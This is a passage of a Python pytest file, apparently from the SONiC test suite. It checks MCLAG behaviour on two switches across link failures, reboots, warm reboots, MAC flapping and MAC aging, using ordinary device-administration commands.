duthost2.shell("config interface startup {}".format(g_vars['peer_link_interface']))
time.sleep(5)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase4_KeepaliveLinkStatusChange():
keepalive_intf = []
@pytest.fixture(scope="function")
def setup_keepalive_link(self, duthost):
res = duthost.shell("show ip route {}|grep '*'".format(mclag_peer_ip.ip))['stdout']
self.keepalive_intf = [entry.split("via ")[-1] for entry in res.split("\n")] if "via" in res else [res.split(", ")[-1]]
for intf in self.keepalive_intf:
duthost.shell("config interface shutdown {}".format(intf))
time.sleep(20) # default keepalive timeout is 15s
yield
for intf in self.keepalive_intf:
duthost.shell("config interface startup {}".format(intf))
time.sleep(20)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_keepalive_link")
def test_keepalive_link_down(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "ERROR", "Mclag keepalive status should be ERROR on both peers after keepalive link down"
for lag in g_vars['mclag_interfaces']:
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut2_sys_id == g_vars['dut2_router_mac'], "Mclag standby device {} system ID shoule be recovered to default".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res1 = duthost.shell(cmd, module_ignore_errors=True)['stdout']
res2 = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res1 + res2, "Mac and arp should be removed after keepalive link down"
def test_keepalive_link_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after keepalive link up"
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag {} system ID shoule be same after keepalive link up".format(lag)
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase5_PeerKeepaliveBothStatusChange():
keepalive_intf = []
@pytest.fixture(scope="function")
def setup_peer_keepalive_link(self, duthost):
duthost.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
res = duthost.shell("show ip route {}|grep '*'".format(mclag_peer_ip.ip))['stdout']
self.keepalive_intf = [entry.split("via ")[-1] for entry in res.split("\n")] if "via" in res else [res.split(", ")[-1]]
for intf in self.keepalive_intf:
duthost.shell("config interface shutdown {}".format(intf))
time.sleep(20)
yield
duthost.shell("config interface startup {}".format(g_vars['peer_link_interface']))
for intf in self.keepalive_intf:
duthost.shell("config interface startup {}".format(intf))
time.sleep(20)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_peer_keepalive_link")
def test_peer_keepalive_link_down(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "ERROR", "Mclag keepalive status should be ERROR on both peers after peer and keepalive link down"
for lag in g_vars['mclag_interfaces']:
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut2_sys_id == g_vars['dut2_router_mac'], "Mclag standby device {} system ID shoule be recovered to default".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut1_orphan_ports'] + g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res1 = duthost.shell(cmd, module_ignore_errors=True)['stdout']
res2 = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res1 + res2, "Mac and arp should be removed after peer and keepalive link down"
def test_peer_keepalive_link_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after peer and keepalive link up"
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag {} system ID shoule be same after peer and keepalive link up".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase6_ActiveDevStatusChange():
@pytest.fixture(scope="function")
def setup_reboot_active(self, duthost, localhost, delay=10, timeout=180):
dut1_ports = natsorted(g_vars['dut1_port_alias']['port_name_map'].keys())[:len(g_vars['dut1_all_interfaces'])]
for port in dut1_ports:
duthost.shell("config interface shutdown {}".format(port))
duthost.shell("config save -y")
duthost.shell("nohup reboot &", module_ignore_errors=True)
time.sleep(20)
yield
# waiting for ssh to startup
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
wait_until(120, 10, duthost.critical_services_fully_started)
for port in dut1_ports:
duthost.shell("config interface startup {}".format(port))
duthost.shell("config save -y")
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_reboot_active")
def test_active_down(self, duthost, duthost2, ptfhost, testbed):
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut2_status == "ERROR", "Mclag keepalive status should be ERROR on standby after active reboot"
# before send pkts, wait until standby mclag re-aggregate successfully due to router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut2_router_mac']), \
"Standby teamd status should be up and sysid should changes to standby's default mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut2_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut1_all_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res, "{} pointed to peer link should be removed after active reboot".format(module)
def test_active_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after active reboot up"
# before send pkts, wait until standby mclag re-aggregate successfully due to router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut1_router_mac']), \
"Standby teamd status should be up and sysid should be same as active's mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase7_StandbyDevStatusChange():
@pytest.fixture(scope="function")
def setup_reboot_standby(self, duthost2, localhost, delay=10, timeout=180):
dut2_ports = natsorted(g_vars['dut2_port_alias']['port_name_map'].keys())[:len(g_vars['dut2_all_interfaces'])]
for port in dut2_ports:
duthost2.shell("config interface shutdown {}".format(port))
duthost2.shell("config save -y")
duthost2.shell("nohup reboot &", module_ignore_errors=True)
time.sleep(20)
yield
# waiting for ssh to startup
dut_ip = duthost2.host.options['inventory_manager'].get_host(duthost2.hostname).address
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
wait_until(120, 10, duthost2.critical_services_fully_started)
for port in dut2_ports:
duthost2.shell("config interface startup {}".format(port))
duthost2.shell("config save -y")
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_reboot_standby")
def test_standby_down(self, duthost, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == "ERROR", "Mclag keepalive status should be ERROR on active after standby reboot"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut2_all_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res = duthost.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res, "{} pointed to peer link should be removed after standby reboot".format(module)
def test_standby_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after active reboot up"
# before send pkts, wait until standby mclag re-aggregate successfully due to router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut1_router_mac']), \
"Standby teamd status should be up and sysid should be same as active's mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase8_ActiveDevWarmreboot():
ev = threading.Event()
ev.set()
@pytest.fixture(scope="class", autouse=True)
def stop_bg_traffic(self):
yield
self.ev.clear()
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_traffic_during_warmreboot(self, localhost, duthost, ptfhost, testbed, delay=10, timeout=180):
exc_que = Queue.Queue()
params = {
"casename": self.__class__.__name__,
"event": self.ev,
"ptf_runner": ptf_runner,
"exc_queue": exc_que, # use for store exception infos
"host": ptfhost,
"testdir": "ptftests",
"testname": "mclag_test.MclagTest",
"platform_dir": "ptftests",
"params": {
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
}
}
bg_traffic = threading.Thread(target=continuous_traffic_check, kwargs=params)
# start send traffic circularly
bg_traffic.start()
# warm-reboot
duthost.shell("nohup warm-reboot >/dev/null 2>&1 &")
# waiting for ssh to absent then startup
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
res = localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout,
module_ignore_errors=True)
if res.is_failed:
raise Exception('DUT did not warm-reboot, maybe orchagent_restart_check faild')
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
finalizer_state = wait_until(300, 10, check_warm_status, duthost)
# stop send traffic
self.ev.clear()
assert finalizer_state, "Warmreboot expect finished in 300s"
traffic_res = True
if exc_que.qsize() != 0:
traffic_res = False
_, exc_obj, _ = exc_que.get()
assert traffic_res, "Traffic Test Failed \n {}".format(str(exc_obj))
# basic check after warmreboot
assert duthost.critical_services_fully_started
time.sleep(30)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_after_warmreboot(self, syncheck):
# verify mac and arp sync
pass
class TestCase9_StandbyDevWarmreboot():
ev = threading.Event()
ev.set()
@pytest.fixture(scope="class", autouse=True)
def stop_bg_traffic(self):
yield
self.ev.clear()
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_traffic_during_warmreboot(self, localhost, duthost2, ptfhost, testbed, delay=10, timeout=180):
exc_que = Queue.Queue()
params = {
"casename": self.__class__.__name__,
"event": self.ev,
"ptf_runner": ptf_runner,
"exc_queue": exc_que, # use for store exception infos
"host": ptfhost,
"testdir": "ptftests",
"testname": "mclag_test.MclagTest",
"platform_dir": "ptftests",
"params": {
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
}
}
bg_traffic = threading.Thread(target=continuous_traffic_check, kwargs=params)
bg_traffic.start()
# warm-reboot
# If standby warm-reboot, after neighsyncd warm start state changed to reconciled, iccpd will change intf mac after reconnection,
# intf mac change will lead to kernel remove all arp entries, this will cause packet drop. So we modify the neighsyncd_timer to
# avoid it
duthost2.shell("config warm_restart neighsyncd_timer 110")
duthost2.shell("nohup warm-reboot >/dev/null 2>&1 &")
# waiting for ssh to absent then startup
dut_ip = duthost2.host.options['inventory_manager'].get_host(duthost2.hostname).address
res = localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout,
module_ignore_errors=True)
if res.is_failed:
raise Exception('DUT did not warm-reboot, maybe orchagent_restart_check faild')
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
finalizer_state = wait_until(300, 10, check_warm_status, duthost2)
# stop send traffic
self.ev.clear()
assert finalizer_state, "Warmreboot expect finished in 300s"
traffic_res = True
if exc_que.qsize() != 0:
traffic_res = False
_, exc_obj, _ = exc_que.get()
assert traffic_res, "Traffic Test Failed \n {}".format(str(exc_obj))
# basic check after warmreboot
assert duthost2.critical_services_fully_started
time.sleep(30)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_after_warmreboot(self, syncheck):
# verify mac and arp sync
pass
class TestCase10_MacFlapping():
flapping = {}
@pytest.fixture(scope="function")
def setup_mac_flapping(self, ptfhost):
# move first orphan port's host to standby
self.flapping['server1_index'] = len(g_vars['dut1_link_server_interfaces'])/2 - 2
self.flapping['server1_index_flapped'] = len(g_vars['dut1_all_interfaces']) + self.flapping['server1_index']
self.flapping['server1_mac'] = ptfhost.shell("ip netns exec ns%s ip -br link show ivp%s | awk '{print $3}'" % (self.flapping['server1_index']+1, self.flapping['server1_index']+1))['stdout']
self.flapping['server1_ip'] = ptfhost.shell("ip netns exec ns%s ip -br addr show ivp%s | awk '{print $3}'" % (self.flapping['server1_index']+1, self.flapping['server1_index']+1))['stdout']
self.flapping['server1_flapped_mac'] = ptfhost.shell("ip netns exec ns%s ip -br link show ivp%s | awk '{print $3}'" % (self.flapping['server1_index_flapped']+1, self.flapping['server1_index_flapped']+1))['stdout']
self.flapping['server1_flapped_ip'] = ptfhost.shell("ip netns exec ns%s ip -br addr show ivp%s | awk '{print $3}'" % (self.flapping['server1_index_flapped']+1, self.flapping['server1_index_flapped']+1))['stdout']
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} down".format(self.flapping['server1_index']+1))
ptfhost.shell("ip netns delete ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev eth{} address {}".format(self.flapping['server1_index_flapped'], self.flapping['server1_mac']))
ptfhost.shell("ip link add link eth{} name ivp{} type ipvlan mode l2".format(self.flapping['server1_index_flapped'], self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns add ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev ivp{0} netns ns{0}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip address add {1} dev ivp{0}".format(self.flapping['server1_index_flapped']+1, self.flapping['server1_ip']))
yield
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index']+1))
ptfhost.shell("ip netns delete ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev eth{} address {}".format(self.flapping['server1_index_flapped'], self.flapping['server1_flapped_mac']))
ptfhost.shell("ip link add link eth{} name ivp{} type ipvlan mode l2".format(self.flapping['server1_index_flapped'], self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns add ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev ivp{0} netns ns{0}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip address add {1} dev ivp{0}".format(self.flapping['server1_index_flapped']+1, self.flapping['server1_flapped_ip']))
def test_traffic_before_mac_flapping(self, duthost, duthost2, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# verify mclag mac age flag
dut1_mac_res = duthost.shell("show mac|awk '{print $3,$4}'")['stdout_lines']
dut2_mac_res = duthost2.shell("show mac|awk '{print $3,$4}'")['stdout_lines']
dut1_macs_on_orphan_ports = []
dut2_macs_on_orphan_ports = []
for line in dut1_mac_res:
if "Ethernet" in line.split()[-1]:
dut1_macs_on_orphan_ports.append(line.split()[0])
for line in dut2_mac_res:
if "Ethernet" in line.split()[-1]:
dut2_macs_on_orphan_ports.append(line.split()[0])
dut1_mclag_mac_res = duthost.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut2_mclag_mac_res = duthost2.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut1_mclag_mac = {}
dut2_mclag_mac = {}
for line in dut1_mclag_mac_res:
dut1_mclag_mac.update({line.split()[0]: line.split()[-1]})
for line2 in dut2_mclag_mac_res:
dut2_mclag_mac.update({line2.split()[0]: line2.split()[-1]})
for mac in dut1_macs_on_orphan_ports:
assert dut1_mclag_mac[mac] == "P", "Mac learned on DUT1 orphan port should add P age flag on local device"
assert dut2_mclag_mac[mac] == "L", "Mac learned on DUT1 orphan port should add L age flag on peer device"
for mac2 in dut2_macs_on_orphan_ports:
assert dut2_mclag_mac[mac2] == "P", "Mac learned on DUT2 orphan port should add P age flag on local device"
assert dut1_mclag_mac[mac2] == "L", "Mac learned on DUT2 orphan port should add L age flag on peer device"
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_before_mac_flapping(self, syncheck):
# verify mac and arp sync
pass
@pytest.mark.usefixtures("setup_mac_flapping")
def test_mac_flapping(self, duthost, duthost2, ptfhost, testbed):
vlan_ip = ipaddress.IPNetwork(duthost2.shell("ip -br addr show dev Vlan1000|awk '{print $3}'")['stdout'])
ptfhost.shell("ip netns exec ns{} ping {} -c 3 -f -W 2".format(self.flapping['server1_index_flapped']+1, vlan_ip.ip))
time.sleep(60)
# check port after flapping
dut1_mac_port = duthost.shell("show mac|grep -i %s|awk '{print $4}'" % self.flapping['server1_mac'])['stdout']
assert dut1_mac_port == g_vars['peer_link_interface'], \
"Flapping mac {} should pointed to peer link interface on active device, from {} flapped to {}".format(self.flapping['server1_mac'], self.flapping['server1_index'], self.flapping['server1_index_flapped'])
dut2_mac_port = duthost2.shell("show mac|grep -i %s|awk '{print $4}'" % self.flapping['server1_mac'])['stdout']
assert "PortChannel" not in dut2_mac_port, "Flapping mac {} should pointed to orphan port on standby device".format(self.flapping['server1_mac'])
# check mclag age flag after flapping
dut1_mac_flag = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], self.flapping['server1_mac']))['stdout']
dut2_mac_flag = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], self.flapping['server1_mac']))['stdout']
assert dut1_mac_flag == "L", "Mac age flag on active should be L after flapped to standby device"
assert dut2_mac_flag == "P", "Mac age flag on standby should be P after flapped to standby device"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": [self.flapping['server1_index']]
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
class TestCase11_MacSyncAndAge():
dut1_orphan_ports_mac = []
dut2_orphan_ports_mac = []
mclag_interface_mac = []
dut1_down_port_server_mac = []
dut2_down_port_server_mac = []
aging_time = 90
@pytest.fixture(scope="class", autouse=True)
def setup_servers(self, ptfhost):
ptf_extra_vars = {
'test_scenario' : test_scenario,
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces'],
'port_server_count' : 1,
'arp_responder_args' : '--conf /tmp/mclag/mclag_arpresponder.conf -e',
'scaling_test' : True
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario))
ptfhost.copy(src="scripts/arp_responder.py", dest="/opt")
ptfhost.template(src="scripts/arp_responder.conf.j2", dest="/etc/supervisor/conf.d/arp_responder.conf")
ptfhost.template(src="mclag/mclag_arpresponder.j2", dest="/tmp/mclag/mclag_arpresponder.conf")
ptfhost.shell("supervisorctl reread")
ptfhost.shell("supervisorctl update")
ptfhost.shell("supervisorctl start arp_responder")
yield
ptfhost.shell("supervisorctl stop arp_responder", module_ignore_errors=True)
@pytest.fixture(scope="function")
def setup_aging_time(self, duthost, duthost2):
res = duthost.shell("redis-cli -n 0 hget SWITCH_TABLE:switch fdb_aging_time")['stdout']
default_aging_time = res if res else 600
dut_extra_vars = {'aging_time': self.aging_time}
duthost.host.options['variable_manager'].extra_vars = dut_extra_vars
duthost2.host.options['variable_manager'].extra_vars = dut_extra_vars
# duthost.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
# duthost.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
# duthost.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
duthost2.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
duthost2.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
duthost2.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
yield
dut_extra_vars = {'aging_time': default_aging_time}
duthost.host.options['variable_manager'].extra_vars = dut_extra_vars
duthost2.host.options['variable_manager'].extra_vars = dut_extra_vars
# duthost.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
# duthost.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
# duthost.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
duthost2.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
duthost2.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
duthost2.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
@pytest.fixture(scope="function")
def get_mclag_mac_table(self, duthost, duthost2):
dut1_mclag_mac_dump = duthost.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut2_mclag_mac_dump = duthost2.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut1_mclag_mac = {}
dut2_mclag_mac = {}
for line in dut1_mclag_mac_dump:
mac = line.split()[0]
flag = line.split()[-1] if line.split()[-1] != line.split()[0] else "null"
dut1_mclag_mac[mac] = flag
for line in dut2_mclag_mac_dump:
mac = line.split()[0]
flag = line.split()[-1] if line.split()[-1] != line.split()[0] else "null"
dut2_mclag_mac[mac] = flag
return dut1_mclag_mac, dut2_mclag_mac
@pytest.fixture(scope="function")
